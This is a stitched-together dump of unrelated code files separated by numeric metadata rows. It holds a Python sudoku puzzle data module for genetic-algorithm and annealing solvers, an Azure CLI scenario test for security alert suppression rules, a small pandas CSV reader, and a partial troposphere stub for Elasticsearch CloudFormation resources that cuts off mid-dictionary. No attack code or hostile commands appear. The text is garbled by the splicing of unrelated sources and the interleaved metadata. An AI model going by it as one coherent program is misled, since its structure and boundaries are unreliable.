Creates deepcopy of sudoku puzzles that can be modified and reset
Python by default creates Shallow copies, this solves issues with
Satisfyability.py where when solving a puzzle again the initial puzzle
was already the solved puzzle
"""
copy_sudoku_lists = []
for i in sudoList_Non_NP:
copy_sudoku_lists.append(copy.deepcopy(i))
# Convert each puzzle to a 9x9 numpy array. The nested lists are already
# 9x9, so np.reshape here mainly performs the list -> ndarray conversion.
# NOTE(review): sudo1..sudo30 are module-level names and may be imported
# elsewhere, so the 30 explicit assignments are kept as-is.
sudo1=np.reshape(sudoku1,(9,9))
sudo2=np.reshape(sudoku2,(9,9))
sudo3=np.reshape(sudoku3,(9,9))
sudo4=np.reshape(sudoku4,(9,9))
sudo5=np.reshape(sudoku5,(9,9))
sudo6=np.reshape(sudoku6,(9,9))
sudo7=np.reshape(sudoku7,(9,9))
sudo8=np.reshape(sudoku8,(9,9))
sudo9=np.reshape(sudoku9,(9,9))
sudo10=np.reshape(sudoku10,(9,9))
sudo11=np.reshape(sudoku11,(9,9))
sudo12=np.reshape(sudoku12,(9,9))
sudo13=np.reshape(sudoku13,(9,9))
sudo14=np.reshape(sudoku14,(9,9))
sudo15=np.reshape(sudoku15,(9,9))
sudo16=np.reshape(sudoku16,(9,9))
sudo17=np.reshape(sudoku17,(9,9))
sudo18=np.reshape(sudoku18,(9,9))
sudo19=np.reshape(sudoku19,(9,9))
sudo20=np.reshape(sudoku20,(9,9))
sudo21=np.reshape(sudoku21,(9,9))
sudo22=np.reshape(sudoku22,(9,9))
sudo23=np.reshape(sudoku23,(9,9))
sudo24=np.reshape(sudoku24,(9,9))
sudo25=np.reshape(sudoku25,(9,9))
sudo26=np.reshape(sudoku26,(9,9))
sudo27=np.reshape(sudoku27,(9,9))
sudo28=np.reshape(sudoku28,(9,9))
sudo29=np.reshape(sudoku29,(9,9))
sudo30=np.reshape(sudoku30,(9,9))
#Reshaped 9x9 list used for Simulated_Annealing.py
sudoLst=[sudo1,sudo2,sudo3,sudo4,sudo5,sudo6,sudo7,
         sudo8,sudo9,sudo10,sudo11,sudo12,sudo13,sudo14,
         sudo15,sudo16,sudo17,sudo18,sudo19,sudo20,sudo21,
         sudo22,sudo23,sudo24,sudo25,sudo26,sudo27,sudo28,sudo29,sudo30]
#Following functions used for ga.py
def s1():
    """Return a fresh copy of puzzle 1 as a 9x9 grid (0 = empty cell); used by ga.py."""
    sudoku1 = [[0,0,0,4,0,0,2,0,0],[7,0,8,5,2,6,0,9,0],[5,0,0,0,1,0,0,0,0],[2,3,5,0,0,0,0,0,1],[0,0,6,0,7,0,4,0,0],[4,0,0,0,0,0,6,3,9],[0,0,0,0,3,0,0,0,7],[0,6,0,1,5,2,9,0,4],[0,0,4,0,0,8,0,0,0]]
    return sudoku1
def s2():
    """Return a fresh copy of puzzle 2 as a 9x9 grid (0 = empty cell); used by ga.py."""
    sudoku2 = [[0,0,0,0,1,2,8,4,5],[0,1,0,7,0,0,0,3,0],[0,8,0,6,0,9,0,0,0],[2,0,0,0,0,7,4,0,0],[0,0,5,0,0,0,9,0,0],[0,0,8,9,0,0,0,0,2],[0,0,0,1,0,3,0,9,0],[0,3,0,0,0,4,0,8,0],[1,5,9,2,6,0,0,0,0]]
    return sudoku2
def s3():
    """Return a fresh copy of puzzle 3 as a 9x9 grid (0 = empty cell); used by ga.py."""
    sudoku3 = [[9,8,7,0,0,0,3,0,0],[1,6,0,0,8,0,0,9,0],[0,0,0,0,0,4,1,0,6],[0,2,0,0,0,6,0,0,8],[0,0,0,5,0,7,0,0,0],[3,0,0,9,0,0,0,6,0],[2,0,8,4,0,0,0,0,0],[0,7,0,0,1,0,0,5,9],[0,0,5,0,0,0,8,2,3]]
    return sudoku3
def s4():
    """Return a fresh copy of puzzle 4 as a 9x9 grid (0 = empty cell); used by ga.py."""
    sudoku4 = [[0,1,6,0,0,0,0,3,0],[8,0,0,9,0,0,2,0,6],[0,0,0,0,0,0,0,5,8],[0,7,2,4,0,6,0,0,0],[0,6,9,0,7,0,4,2,0],[0,0,0,3,0,5,9,6,0],[1,3,0,0,0,0,0,0,0],[6,0,4,0,0,1,0,0,5],[0,2,0,0,0,0,8,1,0]]
    return sudoku4
def s5():
    """Return a fresh copy of puzzle 5 as a 9x9 grid (0 = empty cell); used by ga.py."""
    sudoku5 = [[0,3,0,6,0,5,0,8,0],[7,0,0,3,0,0,0,0,0],[0,0,0,9,7,0,5,4,0],[0,6,7,0,0,0,3,0,8],[0,2,0,0,0,0,0,6,0],[4,0,9,0,0,0,7,5,0],[0,9,5,0,3,4,0,0,0],[0,0,0,0,0,7,0,0,2],[0,7,0,1,0,6,0,9,0]]
    return sudoku5
def s6():
    """Return a fresh copy of puzzle 6 as a 9x9 grid (0 = empty cell); used by ga.py."""
    sudoku6 = [[1,0,0,5,0,6,0,9,0],[0,3,0,0,8,0,4,0,0],[6,0,0,0,7,0,1,0,2],[0,0,0,0,0,7,0,2,4],[7,0,0,0,9,0,0,0,8],[9,2,0,6,0,0,0,0,0],[3,0,2,0,5,0,0,0,6],[0,0,1,0,6,0,0,5,0],[0,9,0,8,0,1,0,0,7]]
    return sudoku6
def s7():
    """Return a fresh copy of puzzle 7 as a 9x9 grid (0 = empty cell); used by ga.py."""
    sudoku7 = [[0,0,0,0,0,5,1,7,0],[5,0,9,6,0,1,0,8,0],[0,8,2,0,4,0,0,0,5],[0,0,3,0,0,0,0,0,0],[0,1,0,8,0,7,0,2,0],[0,0,0,0,0,0,5,0,0],[7,0,0,0,9,0,6,5,0],[0,5,0,4,0,6,7,0,8],[0,3,6,5,0,0,0,0,0]]
    return sudoku7
def s8():
    """Return a fresh copy of puzzle 8 as a 9x9 grid (0 = empty cell); used by ga.py."""
    sudoku8 = [[4,0,0,0,0,1,3,0,0],[0,2,0,0,3,0,0,7,6],[0,0,0,0,0,9,0,4,8],[0,6,0,0,0,7,2,5,0],[0,1,0,0,4,0,0,3,0],[0,5,7,3,0,0,0,9,0],[6,7,0,1,0,0,0,0,0],[1,9,0,0,5,0,0,6,0],[0,0,5,8,0,0,0,0,3]]
    return sudoku8
def s9():
    """Return a fresh copy of puzzle 9 as a 9x9 grid (0 = empty cell); used by ga.py."""
    sudoku9 = [[5,0,0,0,4,7,0,8,0],[0,7,0,5,0,0,0,0,0],[9,0,8,0,6,0,0,2,5],[0,2,0,0,0,3,0,0,0],[7,0,0,8,0,6,0,0,3],[0,0,0,9,0,0,0,4,0],[2,1,0,0,3,0,8,0,6],[0,0,0,0,0,9,0,5,0],[0,8,0,1,2,0,0,0,7]]
    return sudoku9
def s10():
    """Return a fresh copy of puzzle 10 as a 9x9 grid (0 = empty cell); used by ga.py."""
    sudoku10 = [[3,2,0,0,8,0,0,0,1],[0,5,0,0,0,0,0,0,9],[8,9,1,0,7,0,3,0,0],[5,1,0,0,4,0,0,0,0],[0,0,0,7,0,3,0,0,0],[0,0,0,0,6,0,0,9,4],[0,0,8,0,3,0,9,4,6],[4,0,0,0,0,0,0,8,0],[9,0,0,0,1,0,0,5,3]]
    return sudoku10
def s11():
    """Return a fresh copy of puzzle 11 as a 9x9 grid (0 = empty cell); used by ga.py."""
    sudoku11 = [[2,0,0,0,0,1,0,6,8],[1,8,4,0,0,0,0,0,0],[7,0,0,0,0,2,9,0,0],[0,4,1,0,2,0,0,7,0],[0,0,7,0,0,0,8,0,0],[0,6,0,0,3,0,1,5,0],[0,0,5,2,0,0,0,0,4],[0,0,0,0,0,0,2,8,7],[4,9,0,3,0,0,0,0,6]]
    return sudoku11
def s12():
    """Return a fresh copy of puzzle 12 as a 9x9 grid (0 = empty cell); used by ga.py."""
    sudoku12 = [[6,1,0,0,0,9,0,0,2],[0,0,0,2,0,0,0,0,5],[0,0,5,1,6,4,8,0,0],[2,3,0,0,0,5,1,0,0],[0,0,0,0,0,0,0,0,0],[0,0,9,3,0,0,0,4,8],[0,0,6,9,1,8,5,0,0],[5,0,0,0,0,3,0,0,0],[8,0,0,7,0,0,0,9,6]]
    return sudoku12
def s13():
    """Return a fresh copy of puzzle 13 as a 9x9 grid (0 = empty cell); used by ga.py."""
    sudoku13 = [[0,0,0,0,2,8,0,0,0],[0,7,0,9,4,0,0,1,6],[6,0,0,0,0,0,2,0,8],[0,3,0,0,6,2,0,0,0],[0,0,2,4,0,7,9,0,0],[0,0,0,3,9,0,0,7,0],[1,0,7,0,0,0,0,0,4],[5,2,0,0,3,4,0,8,0],[0,0,0,7,8,0,0,0,0]]
    return sudoku13
def s14():
    """Return a fresh copy of puzzle 14 as a 9x9 grid (0 = empty cell); used by ga.py."""
    sudoku14 = [[0,0,4,9,0,0,0,2,0],[5,2,0,6,0,0,0,0,7],[0,3,0,0,0,0,0,4,6],[8,0,0,3,7,0,2,0,0],[0,0,5,0,6,0,4,0,0],[0,0,2,0,5,9,0,0,8],[4,1,0,0,0,0,0,8,0],[2,0,0,0,0,1,0,6,9],[0,6,0,0,0,3,7,0,0]]
    return sudoku14
def s15():
    """Return a fresh copy of puzzle 15 as a 9x9 grid (0 = empty cell); used by ga.py."""
    sudoku15 = [[0,6,8,0,0,9,0,0,0],[0,1,0,0,6,0,0,5,0],[7,0,0,5,0,1,8,0,0],[6,0,2,0,4,0,0,7,5],[0,0,0,0,0,0,0,0,0],[3,5,0,0,1,0,2,0,9],[0,0,5,3,0,6,0,0,1],[0,9,0,0,2,0,0,3,0],[0,0,0,1,0,0,7,9,0]]
    return sudoku15
def s16():
    """Return a fresh copy of puzzle 16 as a 9x9 grid (0 = empty cell); used by ga.py."""
    sudoku16 = [[0,0,0,4,0,2,8,1,6],[0,0,0,8,6,7,0,2,0],[0,0,6,0,0,0,0,0,0],[7,0,5,6,0,0,0,0,0],[9,0,0,3,0,5,0,0,1],[0,0,0,0,0,4,2,0,9],[0,0,0,0,0,0,4,0,0],[0,7,0,9,1,3,0,0,0],[6,5,2,7,0,8,0,0,0]]
    return sudoku16
def s17():
    """Return a fresh copy of puzzle 17 as a 9x9 grid (0 = empty cell); used by ga.py."""
    sudoku17 = [[0,6,0,1,0,0,2,0,0],[0,3,0,0,2,4,6,0,7],[0,0,2,0,0,0,0,0,8],[0,0,0,0,0,0,5,0,4],[0,7,8,2,0,6,9,3,0],[3,0,1,0,0,0,0,0,0],[6,0,0,0,0,0,3,0,0],[2,0,3,9,7,0,0,1,0],[0,0,4,0,0,8,0,2,0]]
    return sudoku17
def s18():
    """Return a fresh copy of puzzle 18 as a 9x9 grid (0 = empty cell); used by ga.py."""
    sudoku18 = [[0,4,0,9,0,6,0,0,0],[0,0,8,0,0,0,4,7,1],[0,7,3,0,1,0,0,6,2],[0,0,4,0,0,3,0,1,0],[0,0,0,0,0,0,0,0,0],[0,1,0,6,0,0,8,0,0],[1,9,0,0,3,0,2,4,0],[3,2,5,0,0,0,7,0,0],[0,0,0,5,0,2,0,9,0]]
    return sudoku18
def s19():
    """Return a fresh copy of puzzle 19 as a 9x9 grid (0 = empty cell); used by ga.py."""
    sudoku19 = [[0,2,8,0,0,0,0,0,9],[0,0,4,0,0,2,8,3,0],[0,9,0,8,0,6,0,0,0],[0,0,6,0,0,8,0,7,0],[0,3,0,4,0,7,0,2,0],[0,4,0,6,0,0,9,0,0],[0,0,0,2,0,1,0,8,0],[0,6,2,7,0,0,1,0,0],[3,0,0,0,0,0,2,4,0]]
    return sudoku19
def s20():
    """Return a fresh copy of puzzle 20 as a 9x9 grid (0 = empty cell); used by ga.py."""
    sudoku20 = [[0,0,7,3,0,0,8,0,0],[8,0,3,1,5,0,0,9,0],[0,0,1,6,0,0,0,0,0],[7,9,0,0,0,0,2,1,6],[0,0,0,0,0,0,0,0,0],[1,8,2,0,0,0,0,3,4],[0,0,0,0,0,5,4,0,0],[0,5,0,0,2,8,1,0,3],[0,0,4,0,0,3,9,0,0]]
    return sudoku20
def s21():
    """Return a fresh copy of puzzle 21 as a 9x9 grid (0 = empty cell); used by ga.py."""
    sudoku21 = [[1,3,4,5,0,6,0,9,0],[0,0,0,0,0,9,0,0,0],[6,9,0,0,7,1,0,0,0],[4,0,3,0,0,0,1,0,0],[0,1,0,0,0,0,0,7,0],[0,0,2,0,0,0,5,0,4],[0,0,0,1,9,0,0,4,6],[0,0,0,8,0,0,0,0,0],[0,5,0,7,0,3,9,8,1]]
    return sudoku21
def s22():
    """Return a fresh copy of puzzle 22 as a 9x9 grid (0 = empty cell); used by ga.py."""
    sudoku22 = [[1,0,3,0,0,2,7,8,0],[0,0,0,0,0,3,2,0,0],[0,4,6,0,7,5,0,0,1],[0,0,1,0,0,0,8,0,4],[0,0,0,0,0,0,0,0,0],[7,0,8,0,0,0,5,0,0],[6,0,0,9,4,0,1,5,0],[0,0,9,3,0,0,0,0,0],[0,1,4,7,0,0,3,0,9]]
    return sudoku22
def s23():
    """Return a fresh copy of puzzle 23 as a 9x9 grid (0 = empty cell); used by ga.py."""
    sudoku23 = [[0,0,7,0,5,0,0,2,9],[4,9,0,0,0,0,7,6,0],[0,0,0,0,1,0,0,0,0],[1,3,0,5,0,0,0,7,0],[0,7,4,0,0,0,8,3,0],[0,8,0,0,0,3,0,1,2],[0,0,0,0,4,0,0,0,0],[0,4,9,0,0,0,0,8,6],[7,5,0,0,9,0,1,0,0]]
    return sudoku23
def s24():
    """Return a fresh copy of puzzle 24 as a 9x9 grid (0 = empty cell); used by ga.py."""
    sudoku24 = [[0,1,0,0,7,0,0,0,0],[0,7,6,9,0,0,8,5,3],[0,0,0,3,0,4,0,0,0],[0,6,7,0,5,0,2,0,9],[0,0,0,0,0,0,0,0,0],[1,0,8,0,9,0,7,4,0],[0,0,0,1,0,7,0,0,0],[2,8,1,0,0,9,4,6,0],[0,0,0,0,2,0,0,9,0]]
    return sudoku24
def s25():
    """Return a fresh copy of puzzle 25 as a 9x9 grid (0 = empty cell); used by ga.py."""
    sudoku25 = [[0,5,0,0,0,2,0,0,9],[0,0,0,0,1,9,0,0,7],[0,0,8,3,4,0,0,0,0],[0,0,0,4,0,0,0,9,3],[7,0,3,9,2,8,4,0,5],[9,6,0,0,0,5,0,0,0],[0,0,0,0,9,3,8,0,0],[2,0,0,7,6,0,0,0,0],[3,0,0,8,0,0,0,1,0]]
    return sudoku25
def s26():
    """Return a fresh copy of puzzle 26 as a 9x9 grid (0 = empty cell); used by ga.py."""
    sudoku26 = [[0,0,0,2,8,0,0,0,0],[4,9,0,0,0,5,0,2,0],[0,0,2,0,0,0,5,3,7],[9,0,0,0,0,8,0,7,0],[0,0,7,1,0,2,4,0,0],[0,8,0,3,0,0,0,0,6],[7,4,6,0,0,0,9,0,0],[0,1,0,5,0,0,0,6,3],[0,0,0,0,7,1,0,0,0]]
    return sudoku26
def s27():
    """Return a fresh copy of puzzle 27 as a 9x9 grid (0 = empty cell); used by ga.py."""
    sudoku27 = [[0,0,7,0,0,0,0,0,0],[1,0,9,5,6,0,0,0,0],[0,5,0,0,0,8,0,0,2],[8,3,2,0,0,6,1,0,0],[7,4,0,0,0,0,0,9,6],[0,0,6,2,0,0,4,8,3],[2,0,0,9,0,0,0,5,0],[0,0,0,0,4,7,6,0,8],[0,0,0,0,0,0,3,0,0]]
    return sudoku27
def s28():
    """Return a fresh copy of puzzle 28 as a 9x9 grid (0 = empty cell); used by ga.py."""
    sudoku28 = [[8,0,0,4,5,0,7,0,0],[0,0,0,0,2,0,3,0,0],[9,0,7,3,0,8,0,0,2],[0,6,0,0,0,0,0,0,3],[0,8,4,0,9,0,2,7,0],[7,0,0,0,0,0,0,5,0],[2,0,0,6,0,7,5,0,4],[0,0,8,0,4,0,0,0,0],[0,0,5,0,1,3,0,0,9]]
    return sudoku28
def s29():
    """Return a fresh copy of puzzle 29 as a 9x9 grid (0 = empty cell); used by ga.py."""
    sudoku29 = [[0,5,0,0,8,0,6,4,0],[0,0,7,0,0,1,9,0,0],[3,0,0,0,2,9,0,0,1],[0,0,8,0,0,2,0,7,3],[0,0,0,0,5,0,0,0,0],[2,9,0,8,0,0,1,0,0],[6,0,0,9,1,0,0,0,7],[0,0,2,3,0,0,4,0,0],[0,3,1,0,7,0,0,5,0]]
    return sudoku29
def s30():
    """Return a fresh copy of puzzle 30 as a 9x9 grid (0 = empty cell); used by ga.py."""
    sudoku30 = [[1,0,0,8,5,0,3,0,6],[0,0,0,0,6,0,0,8,0],[5,0,8,0,0,4,0,0,9],[0,0,0,3,0,0,0,0,1],[0,9,1,0,0,0,2,7,0],[3,0,0,0,0,2,0,0,0],[9,0,0,6,0,0,1,0,7],[0,5,0,0,9,0,0,0,0],[8,0,7,0,4,3,0,0,2]]
    return sudoku30
| 34.713024
| 196
| 0.477774
| 5,372
| 15,725
| 1.396873
| 0.031646
| 0.473348
| 0.392591
| 0.285714
| 0.71322
| 0.710821
| 0.709222
| 0.709222
| 0.709222
| 0.709222
| 0
| 0.381191
| 0.110143
| 15,725
| 453
| 197
| 34.713024
| 0.155078
| 0.012273
| 0
| 0.014888
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074442
| false
| 0
| 0.002481
| 0
| 0.151365
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
db1f57f174b876d999325307f94a0ceb8191d823
| 2,800
|
py
|
Python
|
src/azure-cli/azure/cli/command_modules/security/tests/latest/test_alerts_suppression_rules.py
|
ZengTaoxu/azure-cli
|
6be96de450da5ac9f07aafb22dd69880bea04792
|
[
"MIT"
] | null | null | null |
src/azure-cli/azure/cli/command_modules/security/tests/latest/test_alerts_suppression_rules.py
|
ZengTaoxu/azure-cli
|
6be96de450da5ac9f07aafb22dd69880bea04792
|
[
"MIT"
] | null | null | null |
src/azure-cli/azure/cli/command_modules/security/tests/latest/test_alerts_suppression_rules.py
|
ZengTaoxu/azure-cli
|
6be96de450da5ac9f07aafb22dd69880bea04792
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import pytest
from azure.cli.testsdk import ScenarioTest
class SecurityCenterAlertsSuppressionRuleTests(ScenarioTest):
    """Live-service scenario test for `az security alerts-suppression-rule`.

    Exercises the full rule lifecycle against the Security Center API:
    create/update, scope upsert and delete, show, list, and final delete.
    Each step only asserts a non-empty JSON payload came back.
    """

    def test_security_alerts_suppression_rule(self):
        # Random rule name so parallel/repeated runs do not collide.
        self.kwargs.update({
            'rule_name': self.create_random_name(prefix='azurecli-test', length=24)
        })
        # `update` also creates the rule when it does not exist yet.
        azure_cli_new_suppression_rule = self.cmd('az security alerts-suppression-rule update --rule-name {rule_name} --alert-type "Test" --reason "Other" --comment "Test comment" --state "Enabled"').get_output_in_json()
        assert len(azure_cli_new_suppression_rule) > 0
        # Second update changes the alert type on the existing rule.
        azure_cli_new_suppression_rule = self.cmd('az security alerts-suppression-rule update --rule-name {rule_name} --alert-type "Test2" --reason "Other" --comment "Test comment" --state "Enabled"').get_output_in_json()
        assert len(azure_cli_new_suppression_rule) > 0
        # NOTE(review): `upsert_scope`/`delete_scope` use underscores while the
        # rest of the CLI surface is hyphenated — presumably intentional
        # subcommand names; confirm against the command module.
        azure_cli_new_suppression_rule_scope = self.cmd('az security alerts-suppression-rule upsert_scope --rule-name {rule_name} --field "entities.process.commandline" --contains-substring "example"').get_output_in_json()
        assert len(azure_cli_new_suppression_rule_scope) > 0
        azure_cli_new_suppression_rule_scope = self.cmd('az security alerts-suppression-rule upsert_scope --rule-name {rule_name} --field "entities.account.name" --contains-substring "example"').get_output_in_json()
        assert len(azure_cli_new_suppression_rule_scope) > 0
        # Remove both scopes that were just added.
        azure_cli_new_suppression_rule_scope = self.cmd('az security alerts-suppression-rule delete_scope --rule-name {rule_name} --field "entities.process.commandline"').get_output_in_json()
        assert len(azure_cli_new_suppression_rule_scope) > 0
        azure_cli_new_suppression_rule_scope = self.cmd('az security alerts-suppression-rule delete_scope --rule-name {rule_name} --field "entities.account.name"').get_output_in_json()
        assert len(azure_cli_new_suppression_rule_scope) > 0
        # Read the rule back individually and via the list endpoint.
        azure_cli_get_suppression_rule = self.cmd('az security alerts-suppression-rule show --rule-name {rule_name}').get_output_in_json()
        assert len(azure_cli_get_suppression_rule) > 0
        azure_cli_list_suppression_rule = self.cmd('az security alerts-suppression-rule list').get_output_in_json()
        assert len(azure_cli_list_suppression_rule) > 0
        # Clean up the rule created by this test.
        self.cmd('az security alerts-suppression-rule delete --rule-name {rule_name}')
| 66.666667
| 226
| 0.685357
| 348
| 2,800
| 5.183908
| 0.212644
| 0.216186
| 0.073171
| 0.146341
| 0.786585
| 0.757206
| 0.757206
| 0.757206
| 0.715078
| 0.604213
| 0
| 0.004647
| 0.154643
| 2,800
| 42
| 227
| 66.666667
| 0.757499
| 0.12
| 0
| 0.25
| 0
| 0.25
| 0.397154
| 0.127236
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.041667
| false
| 0
| 0.083333
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e1ddc641910f7c5a07c3f1e725281830f65923fa
| 208
|
py
|
Python
|
dd/api/workflow/readers.py
|
octo-technology/ddapi
|
08b56016bf59a02c42d79a117a8de1e23e5b4f90
|
[
"Apache-2.0"
] | 4
|
2019-06-09T13:15:37.000Z
|
2020-12-22T08:37:36.000Z
|
dd/api/workflow/readers.py
|
octo-technology/ddapi
|
08b56016bf59a02c42d79a117a8de1e23e5b4f90
|
[
"Apache-2.0"
] | null | null | null |
dd/api/workflow/readers.py
|
octo-technology/ddapi
|
08b56016bf59a02c42d79a117a8de1e23e5b4f90
|
[
"Apache-2.0"
] | null | null | null |
import pandas as pd
class CSVReader(object):
    """Thin wrapper around ``pandas.read_csv`` with preset keyword options.

    The options given at construction time are forwarded verbatim to every
    subsequent :meth:`read` call.
    """

    def __init__(self, **read_options):
        # Stored once; applied to every read.
        self.read_options = read_options

    def read(self, path):
        """Load the CSV at *path* into a DataFrame using the stored options."""
        options = self.read_options
        return pd.read_csv(path, **options)
| 23.111111
| 53
| 0.682692
| 29
| 208
| 4.586207
| 0.517241
| 0.330827
| 0.338346
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.211538
| 208
| 9
| 53
| 23.111111
| 0.810976
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.166667
| 0.166667
| 0.833333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
c0514104c99e0e3050dde1da7c4515e95bb6f183
| 12,875
|
py
|
Python
|
stubs/elasticsearch.py
|
claytonbrown/troposphere
|
bf0f1e48b14f578de0221d50f711467ad716ca87
|
[
"BSD-2-Clause"
] | null | null | null |
stubs/elasticsearch.py
|
claytonbrown/troposphere
|
bf0f1e48b14f578de0221d50f711467ad716ca87
|
[
"BSD-2-Clause"
] | null | null | null |
stubs/elasticsearch.py
|
claytonbrown/troposphere
|
bf0f1e48b14f578de0221d50f711467ad716ca87
|
[
"BSD-2-Clause"
] | null | null | null |
from . import AWSObject, AWSProperty
from .validators import *
from .constants import *
# -------------------------------------------
class ElasticsearchElasticsearchClusterConfig(AWSProperty):
    """ElasticsearchClusterConfig property of AWS::Elasticsearch::Domain.

    Generated from CloudFormationResourceSpecification 1.4.0. Each ``props``
    entry maps a property name to
    ``(validator, required, update type, documentation URL)``.
    All properties are optional and mutable.
    """

    props = {
        'DedicatedMasterCount': (positive_integer, False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-elasticsearch-domain-elasticsearchclusterconfig.html#cfn-elasticsearch-domain-elasticseachclusterconfig-dedicatedmastercount'),
        'DedicatedMasterEnabled': (boolean, False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-elasticsearch-domain-elasticsearchclusterconfig.html#cfn-elasticsearch-domain-elasticseachclusterconfig-dedicatedmasterenabled'),
        'DedicatedMasterType': (basestring, False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-elasticsearch-domain-elasticsearchclusterconfig.html#cfn-elasticsearch-domain-elasticseachclusterconfig-dedicatedmastertype'),
        'InstanceCount': (positive_integer, False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-elasticsearch-domain-elasticsearchclusterconfig.html#cfn-elasticsearch-domain-elasticseachclusterconfig-instancecount'),
        # URL anchor spelling ("instnacetype") comes from the upstream spec.
        'InstanceType': (basestring, False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-elasticsearch-domain-elasticsearchclusterconfig.html#cfn-elasticsearch-domain-elasticseachclusterconfig-instnacetype'),
        'ZoneAwarenessEnabled': (boolean, False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-elasticsearch-domain-elasticsearchclusterconfig.html#cfn-elasticsearch-domain-elasticseachclusterconfig-zoneawarenessenabled')
    }
# -------------------------------------------
class ElasticsearchSnapshotOptions(AWSProperty):
    """SnapshotOptions property of AWS::Elasticsearch::Domain.

    Generated from CloudFormationResourceSpecification 1.4.0. Each ``props``
    entry maps a property name to
    ``(validator, required, update type, documentation URL)``.
    """

    props = {
        'AutomatedSnapshotStartHour': (positive_integer, False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-elasticsearch-domain-snapshotoptions.html#cfn-elasticsearch-domain-snapshotoptions-automatedsnapshotstarthour')
    }
# -------------------------------------------
class ElasticsearchEBSOptions(AWSProperty):
    """EBSOptions property of AWS::Elasticsearch::Domain.

    Generated from CloudFormationResourceSpecification 1.4.0. Each ``props``
    entry maps a property name to
    ``(validator, required, update type, documentation URL)``.
    All properties are optional and mutable.
    """

    props = {
        'EBSEnabled': (boolean, False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-elasticsearch-domain-ebsoptions.html#cfn-elasticsearch-domain-ebsoptions-ebsenabled'),
        'Iops': (positive_integer, False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-elasticsearch-domain-ebsoptions.html#cfn-elasticsearch-domain-ebsoptions-iops'),
        'VolumeSize': (positive_integer, False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-elasticsearch-domain-ebsoptions.html#cfn-elasticsearch-domain-ebsoptions-volumesize'),
        'VolumeType': (basestring, False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-elasticsearch-domain-ebsoptions.html#cfn-elasticsearch-domain-ebsoptions-volumetype')
    }
# -------------------------------------------
class ElasticsearchDomain(AWSObject):
    """AWS::Elasticsearch::Domain resource.

    Generated from CloudFormationResourceSpecification 1.4.0. Attributes:
    ``DomainArn`` and ``DomainEndpoint`` (both strings). Each ``props`` entry
    maps a property name to
    ``(validator, required, update type, documentation URL)``.
    ``DomainName`` and ``ElasticsearchVersion`` are immutable after creation.
    """

    resource_type = "AWS::Elasticsearch::Domain"

    # NOTE(review): EBSOptions, ElasticsearchClusterConfig, SnapshotOptions and
    # Tag are not defined in this module (only Elasticsearch-prefixed variants
    # are) — presumably supplied by the star imports at the top of the file;
    # otherwise these should reference the classes defined above. TODO confirm.
    props = {
        'AccessPolicies': ((basestring, dict), False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-elasticsearch-domain.html#cfn-elasticsearch-domain-accesspolicies'),
        'AdvancedOptions': (dict, False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-elasticsearch-domain.html#cfn-elasticsearch-domain-advancedoptions'),
        'DomainName': (basestring, False, 'Immutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-elasticsearch-domain.html#cfn-elasticsearch-domain-domainname'),
        'EBSOptions': (EBSOptions, False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-elasticsearch-domain.html#cfn-elasticsearch-domain-ebsoptions'),
        'ElasticsearchClusterConfig': (ElasticsearchClusterConfig, False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-elasticsearch-domain.html#cfn-elasticsearch-domain-elasticsearchclusterconfig'),
        'ElasticsearchVersion': (basestring, False, 'Immutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-elasticsearch-domain.html#cfn-elasticsearch-domain-elasticsearchversion'),
        'SnapshotOptions': (SnapshotOptions, False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-elasticsearch-domain.html#cfn-elasticsearch-domain-snapshotoptions'),
